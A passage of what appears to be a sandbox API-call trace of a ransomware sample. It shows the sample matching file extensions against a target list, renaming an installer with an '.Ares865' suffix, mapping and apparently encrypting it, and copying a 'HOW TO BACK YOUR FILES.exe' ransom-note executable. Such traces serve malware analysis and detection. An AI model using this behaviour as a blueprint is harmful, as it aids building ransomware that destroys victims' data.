3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0069.842] lstrlenW (lpString="dbx") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0069.842] lstrlenW (lpString="dcb") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0069.842] lstrlenW (lpString="dct") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dct") returned 1 [0069.842] lstrlenW (lpString="dcx") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dcx") returned 1 [0069.842] lstrlenW (lpString="ddl") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="ddl") returned 1 [0069.842] lstrlenW (lpString="dlis") returned 4 [0069.842] lstrcmpiW (lpString1=".exe", lpString2="dlis") returned -1 [0069.842] lstrlenW (lpString="dp1") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dp1") returned 1 [0069.842] lstrlenW (lpString="dqy") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="dqy") returned 1 [0069.843] lstrlenW (lpString="dsk") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="dsk") returned 1 [0069.843] lstrlenW (lpString="dsn") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="dsn") returned 1 [0069.843] lstrlenW (lpString="dtsx") returned 4 [0069.843] lstrcmpiW (lpString1=".exe", lpString2="dtsx") returned -1 [0069.843] lstrlenW (lpString="dxl") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="dxl") returned 1 [0069.843] lstrlenW (lpString="eco") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="eco") returned 1 [0069.843] lstrlenW (lpString="ecx") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="ecx") returned 1 [0069.843] lstrlenW (lpString="edb") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="edb") returned 1 [0069.843] lstrlenW (lpString="epim") returned 4 [0069.843] lstrcmpiW (lpString1=".exe", lpString2="epim") returned -1 [0069.843] lstrlenW (lpString="fcd") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fcd") returned -1 [0069.843] lstrlenW (lpString="fdb") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fdb") returned -1 [0069.843] lstrlenW (lpString="fic") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fic") returned -1 [0069.843] lstrlenW (lpString="flexolibrary") returned 12 [0069.843] lstrcmpiW (lpString1="dist_x86.exe", lpString2="flexolibrary") returned -1 [0069.843] lstrlenW (lpString="fm5") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fm5") returned -1 [0069.843] lstrlenW (lpString="fmp") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fmp") returned -1 [0069.843] lstrlenW (lpString="fmp12") returned 5 [0069.843] lstrcmpiW (lpString1="6.exe", lpString2="fmp12") returned -1 [0069.843] lstrlenW (lpString="fmpsl") returned 5 [0069.843] lstrcmpiW (lpString1="6.exe", lpString2="fmpsl") returned -1 [0069.843] lstrlenW (lpString="fol") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fol") returned -1 [0069.843] lstrlenW (lpString="fp3") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fp3") returned -1 [0069.843] lstrlenW (lpString="fp4") returned 3 [0069.843] lstrcmpiW (lpString1="exe", lpString2="fp4") returned -1 [0069.844] lstrlenW (lpString="fp5") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="fp5") returned -1 [0069.844] lstrlenW (lpString="fp7") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="fp7") returned -1 [0069.844] lstrlenW (lpString="fpt") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="fpt") returned -1 [0069.844] lstrlenW (lpString="frm") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="frm") returned -1 [0069.844] lstrlenW (lpString="gdb") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0069.844] lstrlenW (lpString="gdb") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0069.844] lstrlenW (lpString="grdb") returned 4 [0069.844] lstrcmpiW (lpString1=".exe", lpString2="grdb") returned -1 [0069.844] lstrlenW (lpString="gwi") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="gwi") returned -1 [0069.844] lstrlenW (lpString="hdb") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="hdb") returned -1 [0069.844] lstrlenW (lpString="his") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="his") returned -1 [0069.844] lstrlenW (lpString="ib") returned 2 [0069.844] lstrcmpiW (lpString1="xe", lpString2="ib") returned 1 [0069.844] lstrlenW (lpString="idb") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="idb") returned -1 [0069.844] lstrlenW (lpString="ihx") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="ihx") returned -1 [0069.844] lstrlenW (lpString="itdb") returned 4 [0069.844] lstrcmpiW (lpString1=".exe", lpString2="itdb") returned -1 [0069.844] lstrlenW (lpString="itw") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="itw") returned -1 [0069.844] lstrlenW (lpString="jet") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="jet") returned -1 [0069.844] lstrlenW (lpString="jtx") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="jtx") returned -1 [0069.844] lstrlenW (lpString="kdb") returned 3 [0069.844] lstrcmpiW (lpString1="exe", lpString2="kdb") returned -1 [0069.844] lstrlenW (lpString="kexi") returned 4 [0069.844] lstrcmpiW (lpString1=".exe", lpString2="kexi") returned -1 [0069.844] lstrlenW (lpString="kexic") returned 5 [0069.845] lstrcmpiW (lpString1="6.exe", lpString2="kexic") returned -1 [0069.845] lstrlenW (lpString="kexis") returned 5 [0069.845] lstrcmpiW (lpString1="6.exe", lpString2="kexis") returned -1 [0069.845] lstrlenW (lpString="lgc") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="lgc") returned -1 [0069.845] lstrlenW (lpString="lwx") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="lwx") returned -1 [0069.845] lstrlenW (lpString="maf") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="maf") returned -1 [0069.845] lstrlenW (lpString="maq") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="maq") returned -1 [0069.845] lstrlenW (lpString="mar") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mar") returned -1 [0069.845] lstrlenW (lpString="marshal") returned 7 [0069.845] lstrcmpiW (lpString1="x86.exe", lpString2="marshal") returned 1 [0069.845] lstrlenW (lpString="mas") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mas") returned -1 [0069.845] lstrlenW (lpString="mav") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mav") returned -1 [0069.845] lstrlenW (lpString="maw") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="maw") returned -1 [0069.845] lstrlenW (lpString="mdbhtml") returned 7 [0069.845] lstrcmpiW (lpString1="x86.exe", lpString2="mdbhtml") returned 1 [0069.845] lstrlenW (lpString="mdn") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mdn") returned -1 [0069.845] lstrlenW (lpString="mdt") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mdt") returned -1 [0069.845] lstrlenW (lpString="mfd") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mfd") returned -1 [0069.845] lstrlenW (lpString="mpd") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mpd") returned -1 [0069.845] lstrlenW (lpString="mrg") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mrg") returned -1 [0069.845] lstrlenW (lpString="mud") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mud") returned -1 [0069.845] lstrlenW (lpString="mwb") returned 3 [0069.845] lstrcmpiW (lpString1="exe", lpString2="mwb") returned -1 [0069.845] lstrlenW (lpString="myd") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="myd") returned -1 [0069.846] lstrlenW (lpString="ndf") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="ndf") returned -1 [0069.846] lstrlenW (lpString="nnt") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="nnt") returned -1 [0069.846] lstrlenW (lpString="nrmlib") returned 6 [0069.846] lstrcmpiW (lpString1="86.exe", lpString2="nrmlib") returned -1 [0069.846] lstrlenW (lpString="ns2") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="ns2") returned -1 [0069.846] lstrlenW (lpString="ns3") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="ns3") returned -1 [0069.846] lstrlenW (lpString="ns4") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="ns4") returned -1 [0069.846] lstrlenW (lpString="nsf") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="nsf") returned -1 [0069.846] lstrlenW (lpString="nv") returned 2 [0069.846] lstrcmpiW (lpString1="xe", lpString2="nv") returned 1 [0069.846] lstrlenW (lpString="nv2") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="nv2") returned -1 [0069.846] lstrlenW (lpString="nwdb") returned 4 [0069.846] lstrcmpiW (lpString1=".exe", lpString2="nwdb") returned -1 [0069.846] lstrlenW (lpString="nyf") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="nyf") returned -1 [0069.846] lstrlenW (lpString="odb") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0069.846] lstrlenW (lpString="odb") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0069.846] lstrlenW (lpString="oqy") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="oqy") returned -1 [0069.846] lstrlenW (lpString="ora") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="ora") returned -1 [0069.846] lstrlenW (lpString="orx") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="orx") returned -1 [0069.846] lstrlenW (lpString="owc") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="owc") returned -1 [0069.846] lstrlenW (lpString="p96") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="p96") returned -1 [0069.846] lstrlenW (lpString="p97") returned 3 [0069.846] lstrcmpiW (lpString1="exe", lpString2="p97") returned -1 [0069.847] lstrlenW (lpString="pan") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="pan") returned -1 [0069.847] lstrlenW (lpString="pdb") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="pdb") returned -1 [0069.847] lstrlenW (lpString="pdm") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="pdm") returned -1 [0069.847] lstrlenW (lpString="pnz") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="pnz") returned -1 [0069.847] lstrlenW (lpString="qry") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="qry") returned -1 [0069.847] lstrlenW (lpString="qvd") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="qvd") returned -1 [0069.847] lstrlenW (lpString="rbf") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="rbf") returned -1 [0069.847] lstrlenW (lpString="rctd") returned 4 [0069.847] lstrcmpiW (lpString1=".exe", lpString2="rctd") returned -1 [0069.847] lstrlenW (lpString="rod") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="rod") returned -1 [0069.847] lstrlenW (lpString="rodx") returned 4 [0069.847] lstrcmpiW (lpString1=".exe", lpString2="rodx") returned -1 [0069.847] lstrlenW (lpString="rpd") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="rpd") returned -1 [0069.847] lstrlenW (lpString="rsd") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="rsd") returned -1 [0069.847] lstrlenW (lpString="sas7bdat") returned 8 [0069.847] lstrcmpiW (lpString1="_x86.exe", lpString2="sas7bdat") returned -1 [0069.847] lstrlenW (lpString="sbf") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="sbf") returned -1 [0069.847] lstrlenW (lpString="scx") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="scx") returned -1 [0069.847] lstrlenW (lpString="sdb") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="sdb") returned -1 [0069.847] lstrlenW (lpString="sdc") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="sdc") returned -1 [0069.847] lstrlenW (lpString="sdf") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="sdf") returned -1 [0069.847] lstrlenW (lpString="sis") returned 3 [0069.847] lstrcmpiW (lpString1="exe", lpString2="sis") returned -1 [0069.848] lstrlenW (lpString="spq") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="spq") returned -1 [0069.848] lstrlenW (lpString="te") returned 2 [0069.848] lstrcmpiW (lpString1="xe", lpString2="te") returned 1 [0069.848] lstrlenW (lpString="teacher") returned 7 [0069.848] lstrcmpiW (lpString1="x86.exe", lpString2="teacher") returned 1 [0069.848] lstrlenW (lpString="tmd") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="tmd") returned -1 [0069.848] lstrlenW (lpString="tps") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="tps") returned -1 [0069.848] lstrlenW (lpString="trc") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0069.848] lstrlenW (lpString="trc") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0069.848] lstrlenW (lpString="trm") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="trm") returned -1 [0069.848] lstrlenW (lpString="udb") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="udb") returned -1 [0069.848] lstrlenW (lpString="udl") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="udl") returned -1 [0069.848] lstrlenW (lpString="usr") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="usr") returned -1 [0069.848] lstrlenW (lpString="v12") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="v12") returned -1 [0069.848] lstrlenW (lpString="vis") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="vis") returned -1 [0069.848] lstrlenW (lpString="vpd") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="vpd") returned -1 [0069.848] lstrlenW (lpString="vvv") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="vvv") returned -1 [0069.848] lstrlenW (lpString="wdb") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="wdb") returned -1 [0069.848] lstrlenW (lpString="wmdb") returned 4 [0069.848] lstrcmpiW (lpString1=".exe", lpString2="wmdb") returned -1 [0069.848] lstrlenW (lpString="wrk") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="wrk") returned -1 [0069.848] lstrlenW (lpString="xdb") returned 3 [0069.848] lstrcmpiW (lpString1="exe", lpString2="xdb") returned -1 [0069.848] lstrlenW (lpString="xld") returned 3 [0069.849] lstrcmpiW (lpString1="exe", lpString2="xld") returned -1 [0069.849] lstrlenW (lpString="xmlff") returned 5 [0069.849] lstrcmpiW (lpString1="6.exe", lpString2="xmlff") returned -1 [0069.849] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.Ares865") returned 96 [0069.849] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.ares865"), dwFlags=0x1) returned 1 [0069.850] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0069.850] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=462976) returned 1 [0069.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0069.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0069.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0069.851] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0069.851] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0069.851] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.851] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x71380, lpName=0x0) returned 0x164 [0069.853] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x71380) returned 0x420000 [0070.787] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0070.788] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0070.788] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0070.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0070.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0070.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0070.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0070.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0070.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0070.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0070.788] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0070.793] CloseHandle (hObject=0x164) returned 1 [0070.793] CloseHandle (hObject=0x120) returned 1 [0070.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0070.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0070.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0070.795] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0070.795] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0070.795] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d22e8 [0070.795] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0070.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cff70 | out: hHeap=0x2b0000) returned 1 [0070.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0070.795] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned 71 [0070.795] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0070.795] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.795] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0070.796] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.796] GetLastError () returned 0x20 [0070.796] Sleep (dwMilliseconds=0xc8) [0071.118] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.118] GetLastError () returned 0x20 [0071.118] Sleep (dwMilliseconds=0xc8) [0071.337] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.337] GetLastError () returned 0x20 [0071.337] Sleep (dwMilliseconds=0xc8) [0071.572] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.573] GetLastError () returned 0x20 [0071.573] Sleep (dwMilliseconds=0xc8) [0071.908] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.908] GetLastError () returned 0x20 [0071.908] Sleep (dwMilliseconds=0xc8) [0072.111] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.111] GetLastError () returned 0x20 [0072.111] Sleep (dwMilliseconds=0xc8) [0072.343] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0072.345] GetLastError () returned 0x0 [0072.345] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0072.345] ReadFile (in: hFile=0x164, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0072.398] CloseHandle (hObject=0x164) returned 1 [0072.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0072.399] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.399] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0072.403] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.403] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.404] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0072.405] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.405] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.405] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0072.405] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0072.405] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0072.406] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc63fa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0072.412] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0072.412] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, 